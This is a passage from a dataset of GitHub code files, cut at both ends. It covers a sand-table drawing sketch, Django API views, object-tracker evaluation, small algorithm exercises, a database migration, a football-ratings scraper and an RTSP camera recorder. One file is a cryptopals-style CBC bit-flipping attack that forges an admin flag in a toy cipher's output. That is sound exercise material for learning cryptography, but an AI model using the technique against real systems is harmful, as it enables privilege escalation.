pushMatrix()\n translate(centerScreen,centerScreen) #Go to Center of Screen\n drawBrokenSquare(squareSize)\n # drawBrokenSquare(65)\n # popMatrix()\n squareSize+=sizeIncrementBy\n rotDeg += degIncrementBy\n # time.sleep(.2)\n iterations-=1\n if(iterations==0):\n state+=1\n iterations = 0\n print(xys)\n elif(state == 2):\n translate(centerScreen*2,0)\n drawTable()\n state+=1\n elif(state ==3):\n if( (test[iterations][0] == \"G09\") ):\n # print(\"HELLOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO\")\n # iterations+=1\n pass\n else:\n translate(centerScreen*2+25,25)\n # translate(centerScreen*3,centerScreen)\n # line(xys[iterations][0],xys[iterations][1],xys[iterations+1][0],xys[iterations+1][1])\n line(test[iterations][1],test[iterations][2],test[iterations+1][1],test[iterations+1][2])\n # iterations+=1\n # if iterations+1>=len(xys):\n iterations +=1\n if iterations+1>=len(test):\n state+=1\n # time.sleep(.3)\n\ndef importGcode(fileName):\n f = open(fileName, 'r')\n list = []\n for line in f:\n parts = line.split()\n if len(parts) == 3:\n if parts[0] == \"G01\" or parts[0] == \"G00\":\n x = float(parts[1][1:])\n y = float(parts[2][1:])\n \n # print(parts[1][1:],parts[2][1:])\n list.append((parts[0],x,y))\n elif parts[0] == \"G7 \":\n list.append( (9999,9999) )\n # print(list)\n return list\n\ndef drawTable():\n stroke(255)\n noFill()\n ellipse(centerScreen,centerScreen,tableDiam,tableDiam)\ndef RotatePoint(x,y,deg):\n theta = radians(deg)\n newX = x*cos(theta)-y*sin(theta)\n newY = x*sin(theta)+y*cos(theta)\n return newX,newY\n\ndef drawBrokenSquare(sideLength):\n global lastX\n global lastY\n global endProgram\n cSize = 5\n outOfBoundsCount=0\n xCoords = (1,1,-1,-1)\n yCoords = (1,-1,-1,1)\n # stroke(255) #lets go white\n stroke(204, 102, 0) #orange you glad\n for i in range(4):\n # print(lastX,lastY,xCoords[i]*sideLength,yCoords[i]*sideLength)\n newX = xCoords[i]*sideLength\n newY = yCoords[i]*sideLength\n newX, newY = 
RotatePoint(newX,newY,rotDeg)\n \n # #if outside circle\n # r = sqrt(newX**2+newY**2)\n # if r > tableRadius:\n # # endProgram = True\n # # theta = atan(newY/newX)\n # outOfBoundsCount+=1\n # if outOfBoundsCount==4:\n # endProgram=True\n \n if i==3:\n newY+=sizeIncrementBy\n line(lastX,lastY,newX,newY)\n xys.append((newX,newY))\n # ellipse(newX,newY,cSize,cSize) #draw each Point\n lastX = newX\n lastY = newY\n # time.sleep(1)\n\n \n","repo_name":"shalmi/SandTable","sub_path":"Processing/designMaker/designMaker.pyde","file_name":"designMaker.pyde","file_ext":"pyde","file_size_in_byte":3633,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23278182588","text":"from django.http import JsonResponse\nfrom .models import Drinks, Products\nfrom .serializer import DrinkSerializer, ProdcutsSerializer\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\n\n@api_view(['GET', 'POST'])\ndef drink_list(request,format=None):\n if request.method == 'GET':\n drinks = Drinks.objects.all()\n serializer = DrinkSerializer(drinks, many=True)\n return JsonResponse(serializer.data, safe=False)\n\n if request.method == 'POST':\n serializer = DrinkSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\n@api_view([\"GET\", \"POST\"])\ndef product(request,format=None):\n if request.method == \"GET\":\n products = Products.objects.all()\n productsserializer = ProdcutsSerializer(products, many=True)\n return JsonResponse(productsserializer.data, safe=False)\n\n if request.method == \"POST\":\n products_serializer = ProdcutsSerializer(data=request.data)\n if products_serializer.is_valid():\n products_serializer.save()\n return Response(products_serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response({\"error_msg\":\"not a valid param passed\"},status=status.HTTP_204_NO_CONTENT)\n\n\n@api_view([\"GET\",\"PUT\",\"DELETE\"])\ndef product_details(request,id,format=None):\n try:\n products=Products.objects.get(pk=id)\n except Products.DoesNotExist:\n return Response({\"msg\":\"product not found\"},status=status.HTTP_404_NOT_FOUND)\n\n if request.method == 'GET':\n product_serializer= ProdcutsSerializer(products)\n return Response(product_serializer.data)\n\n elif request.method == \"PUT\":\n product_serializer= ProdcutsSerializer(products, request.data)\n if product_serializer.is_valid():\n product_serializer.save()\n return Response(product_serializer.data, status=status.HTTP_201_CREATED)\n return Response(product_serializer.errors,status=status.HTTP_400_BAD_REQUEST)\n\n elif request.method == 'DELETE':\n products.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\n\n\n","repo_name":"nitish0565/DjangoEcartProject","sub_path":"ecom/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29129634722","text":"from os.path import basename, splitext\nimport numpy as np\nimport glob\nimport math\nimport matplotlib.pyplot as plt\n\n\ndef isNAN(bbox):\n for value in bbox.flatten():\n if math.isnan(value):\n return True\n\ndef interval_overlap(interval_a, interval_b):\n x1, x2 = interval_a\n x3, x4 = interval_b\n\n if x3 < x1:\n if x4 < x1:\n return 0\n else:\n return min(x2,x4) - 
x1\n else:\n if x2 < x3:\n return 0\n else:\n return min(x2,x4) - x3 \n\ndef bbox_iou(box1, box2):\n \"\"\" Compute IOU between two bboxes in the form [x1,y1,w,h]\n \"\"\"\n x1_min = box1[0]\n x1_max = x1_min + box1[2]\n y1_min = box1[1]\n y1_max = y1_min + box1[3]\n\n x2_min = box2[0]\n x2_max = x2_min + box2[2]\n y2_min = box2[1]\n y2_max = y2_min + box2[3]\n\n intersect_w = interval_overlap([x1_min, x1_max], [x2_min, x2_max])\n intersect_h = interval_overlap([y1_min, y1_max], [y2_min, y2_max])\n \n intersect = intersect_w * intersect_h\n \n union = box1[2] * box1[3] + box2[2] * box2[3] - intersect\n \n return float(intersect) / union\n\ndef average_IOU(annots, outputs):\n nb_video = len(annots)\n total_frames = 0\n total_avg_iou = 0.0\n total_avg_lost = 0.0\n for i, annot in enumerate(annots):\n if basename(annot)[:-4] != basename(outputs[i])[:-4]:\n print(\"Annotations:\", annot)\n print(\"Output:\", outputs)\n raise ValueError(\"Wrong annotation and track correspondence.\")\n\n print(\"Evaluating %s.\" % basename(annot))\n\n labels = np.loadtxt(annot, delimiter=',')\n mot_results = np.loadtxt(outputs[i], delimiter=',')\n\n nb_frame = len(labels)\n total_frames += nb_frame\n\n avg_iou = 0.0\n avg_lost = 0.0\n for fi, label in enumerate(labels):\n if fi == 0:\n # Tracking start\n continue\n\n if isNAN(labels[fi]) is True:\n # No target in the frame\n continue\n\n index_list = np.argwhere(mot_results[:, 0] == (fi+1))\n\n if index_list.shape[0] != 0:\n max_iou = 0.0\n for index in index_list[:, 0]:\n bbox = mot_results[index, 2:6]\n iou = bbox_iou(bbox, label)\n if iou > max_iou:\n max_iou = iou\n avg_iou += max_iou\n\n if max_iou == 0.0:\n avg_lost += 1\n else:\n # print(\"Lost frame:\", fi+1)\n avg_lost += 1\n\n print(\"\\tLost target = {} / {}\".format(int(avg_lost), nb_frame - 1))\n\n avg_iou /= (nb_frame - 1)\n avg_lost /= (nb_frame - 1)\n\n print(\"\\tAverage IOU = {:.2f}%\".format(avg_iou * 100))\n print(\"\\tNumber of frames = {}\".format(nb_frame))\n\n total_avg_iou += avg_iou\n total_avg_lost += avg_lost\n\n print(\"==================================================\")\n \n total_avg_iou /= nb_video\n total_avg_lost /= nb_video\n\n print(\"Total frames: {}\".format(total_frames))\n print(\"==================================================\")\n \n return total_avg_iou, total_avg_lost\n\ndef overlap_precision(annots, outputs, threshold):\n nb_video = len(annots)\n total_precision = 0.0\n for i, annot in enumerate(annots):\n if basename(annot)[:-4] != basename(outputs[i])[:-4]:\n raise ValueError(\"Wrong annotation and track correspondence.\")\n\n labels = np.loadtxt(annot, delimiter=',')\n mot_results = np.loadtxt(outputs[i], delimiter=',')\n\n nb_frame = len(labels)\n\n precision = 0.0\n\n for fi, label in enumerate(labels):\n if fi == 0:\n # Tracking start\n continue\n\n if isNAN(labels[fi]) is True:\n # No target in the frame\n continue\n\n index_list = np.argwhere(mot_results[:, 0] == (fi+1))\n\n if index_list.shape[0] != 0:\n max_iou = 0.0\n for index in index_list[:, 0]:\n bbox = mot_results[index, 2:6]\n iou = bbox_iou(bbox, label)\n if iou > max_iou:\n max_iou = iou\n if max_iou > threshold:\n precision += 1\n\n precision /= (nb_frame - 1)\n\n total_precision += precision\n \n total_precision /= nb_video\n \n return total_precision\n\n\ndef success_plot_auc(ann, tra, det=None):\n fig = plt.figure(\"Success plot\")\n t = np.linspace(0.0, 1.0, 30)\n s = np.zeros_like(t)\n for i, threshold in enumerate(t):\n s[i] = overlap_precision(ann, tra, threshold) * 100\n plt.plot(t, 
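             # success plot: overlap precision as a function of the IOU threshold;
             # the mean of this curve (its AUC) is the usual OTB/UAV123 success score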
s)\n auc_score = np.mean(s)\n\n if det is not None:\n det_s = np.zeros_like(t)\n for i, threshold in enumerate(t):\n det_s[i] = overlap_precision(ann, det, threshold) * 100\n plt.plot(t, det_s)\n det_auc_score = np.mean(det_s)\n plt.legend(('YOLO+SORT [{:.1f}]'.format(auc_score), 'YOLO [{:.1f}]'.format(det_auc_score)), loc='upper right')\n else:\n plt.legend(('YOLO+SORT [{:.1f}]'.format(auc_score), ''), loc='upper right')\n\n plt.xlabel('Overlap threshold (IOU)')\n plt.ylabel('Overlap precision[%]')\n plt.title('UAV123, Person only')\n plt.grid(True)\n\n plt.savefig('YOLO_SORT.png')\n plt.show()\n\n","repo_name":"humoncy/my_tracker","sub_path":"sort/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":5399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8620687316","text":"from c10 import cbc_cipher\r\n\r\nclass admin_cipher(cbc_cipher):\r\n def encrypt_data(self, data):\r\n if type(data) == str:\r\n data = data.encode()\r\n assert (b';' not in data and b'=' not in data), \"Not allowed\"\r\n pre = b'comment1=cooking%20MCs;userdata='\r\n post = b';comment2=%20like%20a%20pound%20of%20bacon'\r\n return self.encrypt(pre + data + post)\r\n\r\n def decrypt_data(self, data):\r\n data = ''.join([chr(i) for i in self.decrypt(data)])\r\n datadict = {prop.split('=')[0]: prop.split('=')[1] for prop in data.split(';')}\r\n\r\n #return datadict.pop('admin', False)\r\n return datadict # Nicer than just returning True/False\r\n\r\n# To do: generalize byte flipping method into a function\r\n\r\ndef main():\r\n cph = admin_cipher()\r\n # Calculate input prepend length needed for our stuff to start at a new block\r\n prep_len = len('comment1=cooking%20MCs;userdata=')\r\n input_prep_len = (16 - (prep_len % 16)) % 16\r\n input_prep = input_prep_len * b'X'\r\n # The \\x00's will be flipped to become ; and = resp.\r\n input = input_prep + b'XXXXX\\x00admin\\x00true'\r\n # Positions of the semicolon and equal symbol\r\n sc_idx = prep_len + input_prep_len + 5\r\n eq_idx = prep_len + input_prep_len + 11\r\n # Flipping a byte in block i will scramble block i and flip a byte in block i+1,\r\n # so in order to not scramble the prepended data we add another full block\r\n # before the input. 
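# A quick sanity check for the IoU helpers in evaluation.py above (a hedged
# sketch; `bbox_iou` takes boxes as [x1, y1, w, h] per its docstring, and the
# expected value is worked out by hand).
box_a = [0.0, 0.0, 10.0, 10.0]   # 10x10 box anchored at the origin
box_b = [5.0, 5.0, 10.0, 10.0]   # same size, shifted by (5, 5)
# intersection = 5 * 5 = 25; union = 100 + 100 - 25 = 175
assert abs(bbox_iou(box_a, box_b) - 25.0 / 175.0) < 1e-9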
(Now the block that will be scrambled is just userdata)\r\n output = cph.encrypt_data(16 * b'X' + input)\r\n # Flip relevant bytes\r\n sc_flip = bytes([output[sc_idx] ^ ord(';')])\r\n eq_flip = bytes([output[eq_idx] ^ ord('=')])\r\n output = output[:sc_idx] + sc_flip + output[sc_idx+1:eq_idx] + eq_flip + output[eq_idx+1:]\r\n print(cph.decrypt_data(output))\r\n","repo_name":"nearestneighbour/cryptochallenge","sub_path":"set2/c16.py","file_name":"c16.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74604696487","text":"class Solution:\n def exist(self, board, word: str) -> bool:\n \"\"\"\n Backtracking\n \"\"\"\n rows, cols = len(board), len(board[0])\n visited = set()\n\n def dfs(row, col, current_idx): \n if current_idx == len(word):\n return True\n\n if row<0 or col<0 or row>=rows or col>=cols or board[row][col] != word[current_idx] or (row, col) in visited: \n return False\n\n visited.add((row, col)) # in this iteration of backtrack, we won't need to visited this cell again\n\n # call dfs on each neighbor of current cell\n res = dfs(row+1, col, current_idx+1) or dfs(row-1, col, current_idx+1) or dfs(row, col+1, current_idx+1) or dfs(row, col-1, current_idx+1)\n \n visited.remove((row, col)) # So that this does obstruct other dfs calls\n \n return res\n\n\n for row in range(rows):\n for col in range(cols):\n res = dfs(row, col, 0)\n if res:\n return True\n return False","repo_name":"azmainamin/leetcode","sub_path":"WordSearch.py","file_name":"WordSearch.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71400051048","text":"import random\r\n\r\ndef rand_list(n, m=1000):\r\n array = [random.randint(1, m) for num in range(n)]\r\n return array\r\n\r\ndef quick_sort(array):\r\n if len(array) < 2:\r\n return array\r\n else:\r\n low, selected, high = [], [], []\r\n pivot = array[random.randint(1, len(array)-1)]\r\n\r\n for item in array:\r\n if item < pivot:\r\n low.append(item)\r\n elif item == pivot:\r\n selected.append(item)\r\n elif item > pivot:\r\n high.append(item)\r\n return quick_sort(low) + selected + quick_sort(high)\r\n\r\nprint(quick_sort(rand_list(10)))\r\n","repo_name":"istvan-takacs/projects","sub_path":"sorting algorithms/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35177308923","text":"\"\"\"new\n\nRevision ID: d0a1b5442d0a\nRevises: d35842a8d058\nCreate Date: 2020-09-27 15:22:03.784426\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd0a1b5442d0a'\ndown_revision = 'd35842a8d058'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table(\n \"movement_action\",\n sa.Column('movement_action_id', sa.Integer, primary_key=True),\n sa.Column('repetition', sa.Integer, nullable=False),\n sa.Column('weight', sa.Integer, nullable=False),\n sa.Column('date', sa.Date, nullable=False),\n sa.Column('movement_id', sa.Integer(), nullable=False),\n # sa.ForeignKeyConstraint(('movement_id',), ['movement.movement_id'], ),\n )\n op.create_foreign_key(\n 'fk_movement_action',\n 'movement_action', 'movement',\n ['movement_id'], ['movement_id'],\n )\n\n\ndef downgrade():\n op.drop_constraint('fk_movement_action', 'movement_action', type_='foreignkey')\n 
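# A hedged sketch of the generalized byte-flipping helper that the "To do"
# note in c16.py above asks for (hypothetical name and signature, not part of
# the original repo). CBC decryption XORs each ciphertext block into the next
# plaintext block, so XORing ciphertext byte `idx` with (current ^ target)
# turns the plaintext byte one block later from `current` into `target`.
def flip_byte(ciphertext: bytes, idx: int, current: str, target: str) -> bytes:
    flipped = bytes([ciphertext[idx] ^ ord(current) ^ ord(target)])
    return ciphertext[:idx] + flipped + ciphertext[idx + 1:]

# usage matching the attack above: output = flip_byte(output, sc_idx, '\x00', ';')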
op.drop_table('movement_action')\n","repo_name":"soroushh/Flask_application_with_ec2_instance_docker","sub_path":"migrations/versions/d0a1b5442d0a_create_movement_action_table.py","file_name":"d0a1b5442d0a_create_movement_action_table.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30936521168","text":"import requests\nimport json\nfrom bs4 import BeautifulSoup\n\n\nall_data = dict()\nall_data[\"Premier League\"] = {\"clubs\": []}\nall_data[\"La Liga\"] = {\"clubs\": []}\nall_data[\"Bundesliga\"] = {\"clubs\": []}\n#all_data[\"clubs\"] = []\n\ndef get_data(tournament_name, team):\n url = f\"https://www.fifaratings.com/team/{team}\"\n r = requests.get(url)\n c = r.content\n soup = BeautifulSoup(c, \"html.parser\")\n main_table = soup.find(\"table\", {\"class\": \"table\"}).find(\"tbody\")\n all_players = main_table.find_all(\"tr\")\n ratings = []\n names = []\n positions = []\n\n for player in all_players:\n player_data = player.find_all(\"td\")\n if len(player_data) < 5:\n continue\n player_primary_data = player_data[1]\n # get the player's names\n player_name = player_primary_data.find(\"span\", {\"class\": \"entry-font\"})\n names.append(player_name)\n\n # get the player's positions\n player_position = player_primary_data.find(\"div\", {\"class\": \"text-nowrap\"}).find(\"a\").text\n player_position = filter_position(player_position.strip())\n positions.append(player_position)\n\n # get the player's ratings\n player_rating_tag = player.find_all(\"td\")[2]\n ratings.append(player_rating_tag)\n current_team = {}\n current_team[\"name\"] = filter_club_name(team)\n current_team[\"player_list\"] = []\n filtered_team_name = filter_club_name(team)\n for i in range(len(names)):\n current_team[\"player_list\"].append({\"name\": names[i].text, \"club\": filtered_team_name,\"age\":25, \"position\": positions[i].lower(), \"skill\": int(ratings[i].text)})\n\n all_data[tournament_name][\"clubs\"].append(current_team)\n\ndef filter_position(s):\n if s == \"CDM\" or s == \"CAM\":\n return s[1:]\n if s == \"ST\":\n return \"CF\"\n if s == \"LWB\":\n return \"LB\"\n if s == \"RWB\":\n return \"RB\"\n return s\n\ndef filter_club_name(club):\n new_name = \"\"\n for i in range(len(club)):\n if i == 0 or club[i-1] == \"-\":\n new_name += club[i].upper()\n elif club[i] == \"-\":\n new_name += \" \"\n else:\n new_name += club[i]\n return new_name\n\n\nepl_club_names = [\"manchester-city\", \"liverpool\", \"manchester-united\", \"chelsea\", \"tottenham-hotspur\", \"leicester-city\", \"arsenal\", \"west-ham-united\",\n \"everton\", \"wolverhampton-wanderers\", \"aston-villa\", \"leeds-united\", \"newcastle-united\", \"southampton\", \"burnley\", \"brighton-hove-albion\",\n \"watford\", \"norwich-city\", \"brentford\", \"crystal-palace\"\n ]\n\nla_liga_club_names = [\"real-madrid\", \"atletico-madrid\", \"fc-barcelona\", \"sevilla-fc\", \"villarreal-cf\", \"real-sociedad\", \"athletic-club-de-bilbao\",\n \"real-betis\", \"valencia-cf\", \"levante-ud\", \"granada-cf\", \"rc-celta\", \"ca-osasuna\", \"rcd-espanyol\", \"getafe-cf\",\n \"elche-cf\", \"rcd-mallorca\", \"cadiz-cf\", \"rayo-vallecano\", \"deportivo-alaves\"]\n\nbundesliga_club_names = [\"fc-bayern-munchen\", \"borussia-dortmund\", \"rb-leipzig\", \"borussia-monchengladbach\", \"vfl-wolfsburg\", \"bayer-04-leverkusen\",\n \"eintracht-frankfurt\", \"tsg-1899-hoffenheim\", \"hertha-bsc\", \"1-fc-union-berlin\", \"fc-augsburg\", \"sc-freiburg\", 
\"vfb-stuttgart\",\n \"1-fc-koln\", \"1-fsv-mainz-05\", \"dsc-arminia-bielefeld\", \"vfl-bochum-1848\", \"spvgg-greuther-furth\"]\n\nfor club in epl_club_names:\n get_data(\"Premier League\", club)\n\nfor club in la_liga_club_names:\n get_data(\"La Liga\", club)\n\nfor club in bundesliga_club_names:\n get_data(\"Bundesliga\", club)\n\nwith open(\"../database/all_team_data.json\", \"w\") as file:\n json.dump(all_data, file)\n","repo_name":"koryun23/football-manager","sub_path":"data_parsing/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5720116913","text":"import os\r\nimport cv2\r\nfrom datetime import datetime,timedelta\r\nimport imutils\r\nimport time\r\nfrom pathlib import Path\r\n#----TODO:----#\r\n#Cloud sync.\r\n\r\n#--RTSP SETTINGS--#\r\nrtspSource = 1 #0: Use parameters , 1: Use RTSP string \r\nrtspString = \"rtsp://demo:demo@192.168.1.100:5551/h264_ulaw.sdp\" #RTSP_String\r\nIP = \"192.168.1.100\" #RTSP Parameters\r\nPORT = \"5541\"\r\nEXTENTION = \"h264_ulaw.sdp\"\r\nUSER = \"demo\"\r\nPASS = \"demo\"\r\n\r\n#---RECORD SETTINGS---#\r\nrecordMin = 3 #record new video every x minutes ( min: 1 - max:59 )\r\nputTime = 1 #Put date and time on recorded video (0:No / 1:Yes)\r\nrecordWidth = 320 #only width available, height will set automaticly regarding to source\r\nshowImage = 0 #show live stream (0:No / 1:Yes)\r\nfpsVal = 30 #stream and record fps (max:30 - min:1)\r\nrestartTime = 3 #System will restart if any error occures! (minute)\r\nrecodDays = 5 #How many days will recorded. (depends on free space) [1min ~ 2mb] [7 days = 21GB]\r\ndeleteTime = \"04:00\" #everyday system will delete old records (recodDays) at this time\r\n\r\n#Internal settings. Don't change!\r\nlastMin = 0\r\nresDetected = 0\r\nrecordHeight = 0\r\nrecordCount = 0\r\nfunctionActive = 0\r\ndeleteHour = deleteTime.split(\":\")[0]\r\ndeleteMinute = deleteTime.split(\":\")[1]\r\nlastCleanDate = datetime(1923, 4, 23)\r\ncodec =cv2.VideoWriter_fourcc(*\"mp4v\")\r\n\r\ndef timeStamp():\r\n now = datetime.now()\r\n current_time = now.strftime(\"%d.%m.%Y %H:%M:%S\")\r\n return current_time\r\n\r\ndef frameName():\r\n now = datetime.now() \r\n f_name = now.strftime(\"%Y_%m_%d_%H_%M_%S\")\r\n frame_name = \"{}.mp4\".format(f_name)\r\n return frame_name\r\n\r\ndef appendLog(textVal):\r\n with open('LOG.txt', 'a') as fd:\r\n tm = timeStamp()\r\n fd.write(tm +\">\" + textVal + \"\\n\") \r\n\r\ndef cleanOldRecords(dayRange):\r\n print (\"Cleaning process started!\") #LOG this\r\n appendLog(\"Cleaning process started!\")\r\n thatDate = datetime.now().date() - timedelta(days = dayRange)\r\n for file in os.listdir():\r\n if file.endswith(\".mp4\"):\r\n file_name = file.split(\".\")[0]\r\n fileParams = file_name.split(\"_\")\r\n fileY = fileParams[0]\r\n fileM = fileParams[1]\r\n fileD = fileParams[2]\r\n if thatDate.year >= int(fileY) and thatDate.month >= int(fileM) and thatDate.day >= int(fileD):\r\n deleteStr = \"Deleted : {}\".format(file)\r\n Path.unlink(file) #unComment when it secure!!!\r\n print (deleteStr) #Log this\r\n appendLog(deleteStr)\r\n\r\ndef mainWorkload():\r\n logStr = \"Application started. 
Wait for RTSP connection and first settings!\"\r\n print (logStr)\r\n appendLog (logStr)\r\n\r\n global showImage\r\n global lastMin\r\n global resDetected\r\n global recordHeight\r\n global recordCount\r\n global restartTime\r\n global functionActive\r\n global deleteMinute\r\n global deleteHour\r\n global USER\r\n global PASS\r\n global IP\r\n global PORT\r\n global EXTENTION\r\n global fpsVal\r\n global rtspSource\r\n global rtspString\r\n global lastCleanDate\r\n global recodDays\r\n\r\n if rtspSource == 0:\r\n cap = cv2.VideoCapture(\"rtsp://{}:{}@{}:{}/{}\".format(USER,PASS,IP,PORT,EXTENTION))\r\n else:\r\n cap = cv2.VideoCapture(rtspString)\r\n cap.set(cv2.CAP_PROP_FPS, fpsVal)\r\n\r\n restartTimeSec = restartTime * 60\r\n lastRecorded = \"0000_00_00_00_00_00.mp4\"\r\n c = 0\r\n functionActive = 1\r\n \r\n while(cap.isOpened()):\r\n ret, frame = cap.read()\r\n if resDetected == 0:\r\n width = cap.get(3)\r\n height = cap.get(4)\r\n resRate = width / recordWidth\r\n recordHeight = height / resRate\r\n recordHeight = int(recordHeight)\r\n print (\"Record resolution set as {}x{}\".format(recordWidth, recordHeight))\r\n resDetected = 1\r\n \r\n if recordCount == 0: #first record\r\n n = datetime.now()\r\n firstName = \"{}_{}_{}_{}_{}_{}.mp4\".format(n.year,n.month,n.day,n.hour,n.minute,n.second)\r\n out = cv2.VideoWriter(firstName ,codec, fpsVal, (recordWidth, recordHeight))\r\n recordCount = 1\r\n print (\"First record configured and recording started!\")\r\n \r\n try: \r\n frame = imutils.resize(frame, width=recordWidth) \r\n except:\r\n print (\"Error occurred while image processing. Server might be closed! Checking!\")\r\n time.sleep (2) #wait before check!\r\n if cap.isOpened() == False:\r\n logStr = \"RTSP Server seems closed! Check the RTSP server! System restart in {} min!\".format(restartTime)\r\n appendLog(logStr)\r\n print (logStr) \r\n functionActive = 0\r\n resDetected = 0\r\n recordCount = 0\r\n out.release()\r\n cap.release()\r\n cv2.destroyAllWindows()\r\n time.sleep(restartTimeSec)\r\n return\r\n else:\r\n logStr = \"RTSP Server seems open! Another unidentified error!! System restart in {} min!\".format(restartTime)\r\n appendLog(logStr)\r\n print (logStr)\r\n functionActive = 0\r\n resDetected = 0\r\n recordCount = 0\r\n out.release()\r\n cap.release()\r\n cv2.destroyAllWindows()\r\n time.sleep(restartTimeSec)\r\n break\r\n \r\n if putTime == 1:\r\n timeText = timeStamp()\r\n cv2.putText(img=frame, text=timeText, org=(0, 15), fontFace=cv2.FONT_HERSHEY_PLAIN, fontScale=1, color=(0, 0, 255),thickness=0)\r\n\r\n controlTime = datetime.now()\r\n\r\n if lastCleanDate!=controlTime.date() and str(controlTime.hour) == str(deleteHour) and str(controlTime.minute) == str(deleteMinute):\r\n lastCleanDate = controlTime.date()\r\n cleanOldRecords(recodDays)\r\n \r\n \r\n schTime = controlTime.minute\r\n \r\n if schTime != lastMin and (schTime % recordMin) == 0 :\r\n out.release()\r\n lastMin = schTime\r\n file_name = frameName()\r\n out = cv2.VideoWriter(file_name ,codec, fpsVal, (recordWidth, recordHeight))\r\n logStr = \"LOG : {} saved. {} started to record. Total frame : {}\".format(lastRecorded,file_name,c)\r\n c= 0\r\n print (logStr)\r\n appendLog(logStr)\r\n lastRecorded = file_name\r\n out.write(frame)\r\n c = c+1\r\n \r\n if showImage == 1:\r\n cv2.imshow('TestView', frame)\r\n \r\n if cv2.waitKey(20) & 0xFF == ord('q'):\r\n logStr = \"Video screen closed. 
Application will restart without screen and continue to record!\"\r\n            print (logStr)\r\n            appendLog(logStr)\r\n            out.release()\r\n            showImage = 0\r\n            functionActive = 0\r\n            resDetected = 0\r\n            recordCount = 0\r\n            out.release()\r\n            cap.release()\r\n            cv2.destroyAllWindows()\r\n            break\r\n        \r\nwhile True:\r\n    if functionActive == 0:\r\n        mainWorkload()\r\n","repo_name":"ernecati/rtspRecordER","sub_path":"rtspRecorder.py","file_name":"rtspRecorder.py","file_ext":"py","file_size_in_byte":7193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73676378409","text":"from urllib.request import urlopen,urlretrieve\nfrom urllib.parse import urlencode,parse_qs\n\n# python3's urllib contains 4 modules: request, error, parse and robotparser\n# res = urlopen(\"http://www.baidu.com\")\n# print(res.read().decode('utf-8'))\n\n# urlretrieve can download a web page directly to a local file\n# urlretrieve('http://www.baidu.com','baidu.html') \n\n# urlencode encodes special characters for use in a query string\ndata = {'name': '刘德华','value': '123'}\nqs = urlencode(data)\nprint(qs)\n\n# parse_qs decodes the encoded query string back into a dict\nqs2 = parse_qs(qs)\nprint(qs2)\n","repo_name":"wangquan1024/webSpider","sub_path":"urilib/demo1.py","file_name":"demo1.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"628651586","text":"import csv\nimport random\n\nitem_file=open('items.csv')\nitems=item_file.readlines()\nnum_items=len(items)-1\nitem_file.close()\n\ndish_file=open('dishes.csv')\ndishes=dish_file.readlines()\nnum_dishes=len(dishes)-1\ndish_file.close()\n\nmax_item_per_dish=min(10,num_items)\nmax_amount_item=10\n\ndish_item_file=open('dish_items.csv','w')\ndish_item_file.write('dish_id,item_id,quantity\\n')\n\nD=range(1,num_dishes+1)\nI=range(1,num_items+1)\nfor i in D:\n    k=random.randint(1,max_item_per_dish)\n    dish_i_items=random.sample(I,k)\n    for i_item in dish_i_items:\n        quan=random.randint(1,max_amount_item)\n        dish_item_file.write(str(i)+','+str(i_item)+','+str(quan)+'\\n')\n\ndish_item_file.close()","repo_name":"Akash-116/CS387-Project","sub_path":"Phase2-Project Design document/data/gen_dish_items.py","file_name":"gen_dish_items.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69798279850","text":"import numpy as np\nfrom wordcloud import WordCloud\nimport re\nfrom matplotlib import pyplot as plt\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom nltk.tokenize import TweetTokenizer, RegexpTokenizer\nfrom nltk.corpus import stopwords\nfrom stop_words import get_stop_words\nimport nltk\nfrom collections import Counter\nfrom os import path\nfrom fpdf import FPDF\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg, NavigationToolbar2QT as NavigationToolbar\nfrom twit import *\nfrom interface_ui import Ui_MainWindow\nfrom PySide6.QtGui import QPixmap, QImage\nfrom PySide6.QtWidgets import QApplication, QMainWindow, QVBoxLayout, QWidget, QLabel\nfrom PySide6.QtCore import Qt, QSize, QPropertyAnimation, QIODevice, QUrl, QFile, QTextStream\nfrom PySide6.QtWebEngineCore import QWebEngineSettings\nfrom PySide6.QtWebEngineWidgets import QWebEngineView\nimport sys\nimport tweepy\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib\nmatplotlib.use('Qt5Agg')\n\n\nclass MainWindow(QMainWindow, Ui_MainWindow):\n    \"\"\"\n    